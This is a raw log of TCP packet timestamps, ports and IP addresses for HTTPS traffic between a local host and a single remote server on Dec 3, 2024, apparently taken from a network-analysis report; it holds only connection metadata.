                                                                                                                                                                              Dec 3, 2024 17:45:10.537208080 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.537357092 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.537377119 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.537471056 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.537620068 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.538256884 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.538393974 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.538399935 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.538470030 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.538470030 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.538938999 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.542954922 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.543003082 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.547213078 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.550940990 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.550970078 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:11.770229101 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:11.770296097 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.163780928 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.163780928 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.163810968 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.163826942 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.164207935 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.164315939 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494393110 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.494447947 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494462967 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.494508028 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494627953 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.494674921 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494679928 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.494720936 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494875908 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494923115 CET44349894104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.494955063 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.494977951 CET49894443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.508132935 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.508161068 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:13.508224964 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.508622885 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:13.508634090 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:14.774231911 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:14.774391890 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.214097977 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.214123964 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.214334011 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.214340925 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.214535952 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.214641094 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.562455893 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.562526941 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.562655926 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.562681913 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.562696934 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.562746048 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.562753916 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.562865973 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.563225985 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.567140102 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.567147017 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.567302942 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.569986105 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.570141077 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.570147038 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.570297956 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.578574896 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.579049110 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.579056978 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.579191923 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.586791992 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.586955070 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.682570934 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.683063030 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.762968063 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.766916990 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.767004967 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.767004967 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.767031908 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.771023989 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.774629116 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.775093079 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.775099993 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.775270939 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.782265902 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.782516956 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.782521963 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.782876015 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.790246010 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.790354967 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.797863960 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.798060894 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.798065901 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.798554897 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.809364080 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.809468031 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.809573889 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.809709072 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.809716940 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.809792042 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.813460112 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.813651085 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.813657045 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.813827991 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.821521997 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.821660995 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.829161882 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.829349995 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.829381943 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.829669952 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.836543083 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.836697102 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.836740971 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.836853981 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.963993073 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.964811087 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.964819908 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.964890957 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.966386080 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.966480017 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.966612101 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.966695070 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.971184969 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.971324921 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.971434116 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.971580982 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.976161003 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.976440907 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.981121063 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.981215000 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.981317997 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.981427908 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:16.990931988 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:16.991020918 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.000818014 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.000993967 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.005711079 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.005827904 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.010675907 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.010785103 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.020471096 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.020570040 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.030332088 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.030523062 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.035264969 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.035408020 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.045237064 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.045327902 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.054673910 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.054835081 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.064546108 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.064683914 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.084451914 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.084599018 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.176695108 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.177076101 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.180650949 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.180788040 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.188293934 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.188519001 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.195218086 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.195421934 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.198921919 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.199040890 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.205823898 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.205965042 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.212735891 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.212908030 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.214735031 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.214931011 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.218240976 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.218408108 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.221991062 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.222143888 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.223995924 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.224114895 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.227821112 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.227941990 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.231403112 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.231525898 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.235013962 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.237193108 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.237339020 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.237359047 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.237458944 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.240672112 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.240741968 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.243633986 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.243808985 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.247201920 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.247495890 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.249212980 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.249308109 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.252968073 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.253072023 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.256551027 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.256660938 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.260282040 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.260390043 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.262236118 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.262365103 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.265836000 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.265964031 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.368911028 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.368988037 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.372513056 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.372574091 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.374515057 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.374562025 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.378057957 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.378108025 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.381405115 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.381455898 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.388154984 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.388165951 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.388186932 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.388210058 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.388247013 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.388261080 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.388292074 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.399122953 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.399173021 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.399188995 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.399214983 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.399235010 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.399254084 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.410010099 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.410033941 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.410121918 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.410123110 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.410146952 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.410202026 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.420517921 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.420543909 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.420578957 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.420597076 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.420624018 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.420638084 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.431251049 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.431274891 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.431329012 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.431337118 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.431404114 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.440881968 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.440910101 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.440953016 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.440963030 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.441024065 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.568387032 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.568413019 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.568454027 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.568470001 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.568489075 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.568501949 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.575598955 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.575634003 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.575659990 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.575689077 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.575702906 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.575723886 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.583839893 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.583858967 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.583897114 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.583905935 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.583930969 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.583955050 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.592519045 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.592542887 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.592578888 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.592586040 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.592619896 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.592633963 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.599953890 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.599977970 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.600018024 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.600033998 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.600061893 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.600085974 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.607850075 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.607894897 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.607916117 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.607960939 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.607966900 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.608005047 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.616436005 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.616478920 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.616502047 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.616511106 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.616548061 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.616569996 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.624667883 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.624689102 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.624757051 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.624766111 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.624794960 CET49904443192.168.2.4104.21.68.89
